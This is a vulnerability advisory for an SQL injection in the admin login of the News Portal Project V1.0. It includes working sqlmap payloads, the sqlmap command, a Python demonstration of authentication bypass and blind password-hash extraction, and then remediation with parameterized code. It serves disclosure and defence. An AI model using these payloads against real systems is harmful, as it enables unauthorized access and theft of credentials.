itsourcecode News Portal Project V1.0 SQL Injection Vulnerability
NAME OF AFFECTED PRODUCT(S):
Vendor Homepage :
https://itsourcecode.com/free-projects/php-project/news-portal-project-php-free-download/
AFFECTED AND/OR FIXED VERSION(S):
Vuldb Submitter :
Vulnerable File:
VERSION(S):
Vulnerability Type:
Root Cause:
The root cause lies in the backend login handler, which concatenates the user-controlled value $uname (taken from the POST parameter username) directly into the SQL query without parameterization or input validation.
Specifically, $uname is embedded verbatim in the statement:
SELECT AdminUserName, AdminEmailId, AdminPassword FROM tbladmin WHERE (AdminUserName='$uname' OR AdminEmailId='$uname')
Because no prepared statement or parameter binding is used, an attacker can supply input that closes the quoted string and the opening parenthesis, appends arbitrary SQL logic, and comments out the remainder of the query, thereby bypassing authentication or reading administrator account data (username, e-mail address, and password hash).
The absence of any input filtering, together with a database account that is not restricted to least privilege, further increases the exposure to SQL injection.
Impact:
- Attackers can exploit this SQL injection vulnerability to gain unauthorized database access, leak sensitive data, tamper with data, potentially take broader control of the system, and even cause service interruption, posing a serious threat to system security and business continuity.
DESCRIPTION:
During the security review of the News Portal Project, a critical SQL injection vulnerability was identified in the /admin/index.php file. The application incorporates user-supplied input directly into an SQL query without validation or the use of prepared statements. As a result, attackers can inject SQL through the username POST parameter, which the administrator login function matches against both the administrator username and the e-mail address.
Successful exploitation of this vulnerability may allow attackers to bypass authentication and gain unauthorized access to sensitive administrative information. Immediate remediation is required to mitigate the risk and ensure the security and integrity of the system and its data.
Vulnerability Location:
'username' parameter (POST)
POC:
Parameter: username (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: username=admin') RLIKE (SELECT (CASE WHEN (6435=6435) THEN 0x61646d696e ELSE 0x28 END))-- qmBn&password=1&login=
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: username=admin') AND (SELECT 5400 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(5400=5400,1))),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UhRl&password=1&login=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin') AND (SELECT 8875 FROM (SELECT(SLEEP(5)))IOyR)-- lxyO&password=1&login=
NO AUTHENTICATION REQUIRED
- Exploitation requires no authentication or prior access to the system.
The following sqlmap command was used to confirm the injection during testing (the screenshots referenced by the original report are not reproduced here):
sqlmap -u "http://192.168.1.29/News/newsportal/admin/index.php" \
--data="username=admin&password=1&login=" \
-p username
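The sqlmap payloads above all share one shape: `admin')` closes the quoted string and the opening parenthesis of the advisory's WHERE clause, the attacker's own condition follows, and `-- ` plus a random word (`qmBn`, `UhRl`, `lxyO`) comments out the rest of the statement; the trailing word is there because MySQL requires whitespace after `--`. In the first payload, 0x61646d696e decodes to "admin" and 0x28 to "(", so when the CASE condition is true the column is matched against a regex that hits the admin row, and when it is false the comparison fails. The block below is an added example, not code from the advisory or from the project: it models the vulnerable query in Python over an in-memory SQLite table (the application itself is PHP on MySQL; table and column names are the advisory's, the row and the hash value are constructed) and shows the authentication-bypass payload and a boolean-based blind extraction of the stored hash, which is the general technique behind the first sqlmap payload. MySQL-specific functions such as RLIKE, SLEEP and the FLOOR/RAND error trick are not reproduced.

```python
import sqlite3

# Constructed sample hash for the in-memory table; not a credential from the project.
SEED_HASH = "5f4dcc3b5aa765d61d8327deb882cf99"


def setup_db() -> sqlite3.Connection:
    """In-memory stand-in for the application's tbladmin table (constructed data)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE tbladmin (AdminUserName TEXT, AdminEmailId TEXT, AdminPassword TEXT)"
    )
    con.execute(
        "INSERT INTO tbladmin VALUES ('admin', 'admin@example.com', ?)", (SEED_HASH,)
    )
    return con


def vulnerable_lookup(con: sqlite3.Connection, uname: str):
    """Mirror of the advisory's query: $uname is concatenated straight into the SQL.

    Returns the matching row or None. Any quote, parenthesis or comment marker in
    `uname` becomes part of the statement the engine parses.
    """
    sql = (
        "SELECT AdminUserName, AdminEmailId, AdminPassword FROM tbladmin "
        f"WHERE (AdminUserName='{uname}' OR AdminEmailId='{uname}')"
    )
    return con.execute(sql).fetchone()


def auth_bypass_payload() -> str:
    """Close the quote and the parenthesis, make the WHERE always true, comment out the rest."""
    return "x') OR 1=1-- "


def blind_extract_password_hash(con, user="admin", max_len=64, alphabet="0123456789abcdef"):
    """Boolean-based blind extraction of AdminPassword for `user`.

    Each probe asks one yes/no question: does the row for `user` still come back
    when the WHERE clause is ANDed with "character at position N equals C"?
    A returned row means true, no row means false; the value is rebuilt one
    character at a time. The alphabet assumes a hex-encoded hash.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        for c in alphabet:
            probe = f"{user}') AND (SUBSTR(AdminPassword,{pos},1)='{c}')-- "
            if vulnerable_lookup(con, probe) is not None:
                recovered += c
                break
        else:
            break  # no candidate matched: end of the stored value
    return recovered


if __name__ == "__main__":
    db = setup_db()
    print("bypass row:", vulnerable_lookup(db, auth_bypass_payload()))
    print("hash via blind oracle:", blind_extract_password_hash(db))
```

Against the real application the oracle is the login page's response (a successful lookup versus the failure page) rather than a Python return value, and sqlmap automates exactly this loop; the point of the model is that a single unparameterized string is enough for the whole table row to be read without knowing any credential.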
Suggested Repair
1. Use Prepared Statements and Parameter Binding
Prepared statements should be used instead of dynamically constructing SQL queries with user input. By separating SQL logic from input data, prepared statements ensure that user-supplied values are treated strictly as data and cannot be executed as SQL code, effectively preventing SQL injection attacks.
2. Implement Input Validation and Filtering
All user input should be strictly validated and sanitized before being processed. Input values must conform to expected formats and data types (e.g., usernames or IDs should match predefined patterns). Invalid or unexpected input should be rejected at the application level.
3. Minimize Database User Permissions
The database account used by the application should follow the principle of least privilege. It should only have the minimum permissions required for normal operation. Avoid using highly privileged accounts (such as root or admin) for routine database access to reduce the potential impact of a successful attack.
4. Conduct Regular Security Audits
Perform periodic code reviews and security assessments to identify and remediate vulnerabilities in a timely manner. Regular audits help ensure secure coding practices are followed and reduce the risk of similar issues being introduced in future development.
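The block below is an added example, not the project's code, showing repairs 1 and 2 applied to the advisory's query: the same SELECT with bound parameters, plus an allow-list check on the login identifier. It is written in Python over an in-memory SQLite table so it runs stand-alone (the application itself is PHP on MySQL, where the equivalent change is a mysqli or PDO prepared statement with bound parameters); table and column names are the advisory's, the row and hash are constructed, and the identifier pattern is an assumption to be tightened to what the application actually issues.

```python
import re
import sqlite3

# Allow-list for the login identifier: a local username or an e-mail address.
# This pattern is an assumption for the example; adjust it to the real format.
IDENTIFIER_RE = re.compile(
    r"^(?:[A-Za-z0-9_.-]{1,64}|[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9.-]{1,255})$"
)

# Fixed SQL text: the user value is supplied separately as a bound parameter.
LOOKUP_SQL = (
    "SELECT AdminUserName, AdminEmailId, AdminPassword FROM tbladmin "
    "WHERE (AdminUserName=? OR AdminEmailId=?)"
)


def setup_db() -> sqlite3.Connection:
    """In-memory stand-in for tbladmin (constructed row; the hash is a sample value)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE tbladmin (AdminUserName TEXT, AdminEmailId TEXT, AdminPassword TEXT)"
    )
    con.execute(
        "INSERT INTO tbladmin VALUES ('admin', 'admin@example.com', "
        "'5f4dcc3b5aa765d61d8327deb882cf99')"
    )
    return con


def is_valid_identifier(uname: str) -> bool:
    """Repair 2: reject anything that is not a plausible username or e-mail address."""
    return IDENTIFIER_RE.fullmatch(uname) is not None


def bound_lookup(con: sqlite3.Connection, uname: str):
    """Repair 1 on its own: the value travels as a bound parameter.

    The SQL text never changes, so `uname` is compared as a literal string even
    when it contains quotes, parentheses or `-- `; the injection payloads from the
    advisory simply match no row.
    """
    return con.execute(LOOKUP_SQL, (uname, uname)).fetchone()


def hardened_lookup(con: sqlite3.Connection, uname: str):
    """Repairs 1 and 2 together: malformed identifiers never reach the database."""
    if not is_valid_identifier(uname):
        return None
    return bound_lookup(con, uname)


if __name__ == "__main__":
    db = setup_db()
    print("legitimate:", hardened_lookup(db, "admin"))
    print("payload:   ", hardened_lookup(db, "x') OR 1=1-- "))
```

Parameter binding is the control that actually closes the injection; the allow-list is defence in depth and also keeps obviously malformed input out of logs and error paths. Neither replaces repair 3: the database account the application logs in with should still be limited to SELECT/INSERT/UPDATE on its own tables so that a future bug cannot reach INFORMATION_SCHEMA or other databases.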